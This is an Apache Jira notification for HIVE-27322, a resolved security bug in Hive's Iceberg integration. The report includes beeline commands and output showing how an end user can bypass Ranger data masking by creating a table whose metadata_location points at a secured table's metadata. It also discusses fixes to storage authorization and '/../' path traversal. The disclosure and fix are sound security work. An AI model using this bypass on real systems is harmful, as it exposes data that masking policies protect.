[ 
https://issues.apache.org/jira/browse/HIVE-27322?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Ayush Saxena resolved HIVE-27322.
---------------------------------
    Fix Version/s: 4.0.0
       Resolution: Fixed

> Iceberg: metadata location overrides can cause data breach
> ----------------------------------------------------------
>
>                 Key: HIVE-27322
>                 URL: https://issues.apache.org/jira/browse/HIVE-27322
>             Project: Hive
>          Issue Type: Bug
>          Components: Iceberg integration
>    Affects Versions: 4.0.0-alpha-2
>            Reporter: Janos Kovacs
>            Assignee: Ayush Saxena
>            Priority: Blocker
>              Labels: check, pull-request-available
>             Fix For: 4.0.0
>
>
> Set to bug/blocker instead of enhancement due to its security related nature, 
> Hive4 should not be released w/o fix for this. Please reset if needed.
>  
> Context: 
>  * There are some core tables with sensitive data that users can only query 
> with data masking enforced (e.g. via Ranger). Let's assume this is the 
> `default.icebergsecured` table.
>  * An end-user can only access the masked form of the sensitive data as 
> expected...
>  * The users also have privilege to create new tables in their own sandbox 
> databases - let's assume this is the `default.trojanhorse` table for now.
>  * The user can create a malicious table that exposes the sensitive data 
> non-masked leading to a possible data breach.
>  * Hive runs with doAs=false to be able to enforce FGAC and prevent end-user 
> direct file-system access needs
> Repro:
>  * First make sure the data is secured by the masking policy:
> {noformat}
> <kinit as privileged user>
> beeline -e "
> DROP TABLE IF EXISTS default.icebergsecured PURGE;
> CREATE EXTERNAL TABLE default.icebergsecured (txt string, secret string) 
> STORED BY ICEBERG;
> INSERT INTO default.icebergsecured VALUES ('You might be allowed to see 
> this.','You are NOT allowed to see this!');
> "
> <kinit as end user>
> beeline -e "
> SELECT * FROM default.icebergsecured;
> "
> +------------------------------------+--------------------------------+
> |         icebergsecured.txt         |     icebergsecured.secret      |
> +------------------------------------+--------------------------------+
> | You might be allowed to see this.  | MASKED BY RANGER FOR SECURITY  |
> +------------------------------------+--------------------------------+
> {noformat}
>  * Now let the user to create the malicious table exposing the sensitive data:
> {noformat}
> <kinit as end user>
> SECURED_META_LOCATION=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal"
>  beeline -e "DESCRIBE FORMATTED default.icebergsecured;" 2>/dev/null |grep 
> metadata_location  |grep -v previous_metadata_location | awk '{print $5}')
> beeline -e "
> DROP TABLE IF EXISTS default.trojanhorse;
> CREATE EXTERNAL TABLE default.trojanhorse (txt string, secret string) STORED 
> BY ICEBERG
> TBLPROPERTIES (
>   'metadata_location'='${SECURED_META_LOCATION}');
> SELECT * FROM default.trojanhorse;
> "
> +------------------------------------+-----------------------------------+
> |          trojanhorse.txt           |        trojanhorse.secret         |
> +------------------------------------+-----------------------------------+
> | You might be allowed to see this.  | You are not allowed to see this!  |
> +------------------------------------+-----------------------------------+
> {noformat}
>  
> Currently - after HIVE-26707 - the rwstorage authorization only has either 
> the dummy path or the explicit path set for uri:  
> {noformat}
> Permission denied: user [oozie] does not have [RWSTORAGE] privilege on 
> [iceberg://default/trojanhorse?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Ftrojanhorse%2Fmetadata%2Fdummy.metadata.json]
> Permission denied: user [oozie] does not have [RWSTORAGE] privilege on 
> [iceberg://default/trojanhorse?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Ficebergsecured%2Fmetadata%2F00001-f4c2a428-30ce-4afd-82ff-d46ecbf02244.metadata.json]
>  
> {noformat}
> This is can be used only to decide whether a user is allowed to create 
> iceberg tables in certain databases with certain names but controlling it's 
> metadata location is hard in that form:
>  * it does not provide a variable of "default table location" so a rule needs 
> to know the per-database table location or per-catalog warehouse location to 
> be able to construct it
>  * it does not provide a rich regex to filter out `/../` style directory 
> references
>  * but basically there should be also a flag whether explicit metadata 
> location is provided or not instead of the dummy reference, which then again 
> needs explicit matching in the policy to handle
>  
> Proposed enhancement:
>  * The URL for the iceberg table's rwstorage authorization should be changed 
> the following way
>  ** the <database>/<table>?<location> is good but
>  *** the location should not be url encoded, or at least the authorizer 
> should check the policy against the decoded url
>  *** the separator between the table and location should be "/" instead of 
> "?" as "?" might be mixed with its regex meaning!
>  *** "/" as separator can be also confusing as the absolute paths would start 
> with it. Might be that another separator character that does not conflict 
> with regex, paths and table-name valid characters would be even better.
>  ** the "snapshot=" seems to be non-relevant in this context, it should not 
> be part of the <location>
>  ** There is a need to differentiate the cases where location is only 
> generated or when location is explicitly provided by end user. For this, the 
> "default" location might just not be generated as path but replaced with 
> "default_location" fixed value - note! it has no leading "/". That way a 
> single policy definition could be used to cover all tables in their default 
> locations like:
> {noformat}
> iceberg://mydatabase/*/default_location           or
> iceberg://mydatabase/*/snapshot=default_location{noformat}
>  * 
>  ** 
>  *** "default" here means the table's default location which can depend on 
> the warehouse location, the database location and the table's explicit 
> location
>  *** I know many developers don't like these type of hardcoded static values 
> but with such a value there is no need to modify the rwstorage authorization 
> (and we already using similar method for "METASTOER" type of storagehandler 
> authorization)
>  * The authorization request should include the rwstorage authorization only 
> if the CERATE/ALTER/DROP is against the Iceberg table and not if in such 
> statements the iceberg table is only a source - that might be already in fix 
> via HIVE-27304
>  * When any custom Iceberg metadata.json location is provided then the 
> <location> must contain to provided path to be able to properly authorize it.
>  * We either should not allow backstep "/../" in any locations or give an 
> option to filter these out in the final authorization step.
> Like with a policy on
> {noformat}
> iceberg://mydatabase/mytable//data/use-case-1/*             or
> iceberg://mydatabase/mytable/snapshot=/data/use-case-1/*{noformat}
> should not match access for
> {noformat}
> iceberg://mydatabse/mytable//data/use-case-1/../use-case-2/*          or
> iceberg://mydatabse/mytable/snapshot=/data/use-case-1/../use-case-2/*{noformat}
>  * 
>  ** Not allowing "/../" might be easier to handle on hive/impala side
>  ** But "/../" might be still valid if it used within an allowed locations. 
> --> users just should use proper location w/o "/../"
>  
> With the above changes one single new default Ranger policy could be used to 
> globally enable the creation of iceberg tables in any databases in any table 
> locations but NOT using any custom metadata locations (in case if user 
> doesn't want to globally turn storagehandler authorization off - via 
> hive.security.authorization.tables.on.storagehandlers=false - because of 
> other - hbase, kafka - handlers):
> {noformat}
> iceberg://*/*/default_location              or
> iceberg://*/*/snapshot=default_location  {noformat}
> Note that there is no extra "/" in front of "default_location", only the 
> separator character in the first case
>  
> Also with the above changes we could allow users to configure authorizations 
> for custom/shared data location via:
> {noformat}
> iceberg://mydatabase/*//some/shared/table/location/*              or
> iceberg://mydatabase/*/snapshot=/some/shared/table/location/* {noformat}
>   



--
This message was sent by Atlassian Jira
(v8.20.10#820010)

Reply via email to